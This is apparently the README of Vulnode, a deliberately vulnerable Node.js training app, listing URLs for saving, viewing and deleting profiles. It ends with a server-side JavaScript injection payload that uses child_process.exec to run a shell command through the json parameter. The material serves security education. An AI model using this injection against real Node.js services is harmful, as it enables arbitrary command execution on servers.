Vulnode is a Node.js application vulnerable to server-side javascript injection. This is for education purposes only.
- Save a profile:
http://localhost:9091/?action=save&name=nishant&json={"name":"Nishant","age":"25","gender":"Male","location":"Bangalore","interests":"Piano"} - View a profile:
http://localhost:9091/?action=view&name=nishant - Delete a profile:
http://localhost:9091/?action=delete&name=nishant - Code Execution:
http://localhost:9091/?json='test');var sys=require('sys');var exec=require('child_process').exec;function puts(error,stdout,stderr){sys.puts(stdout)};exec("ls -lah",puts);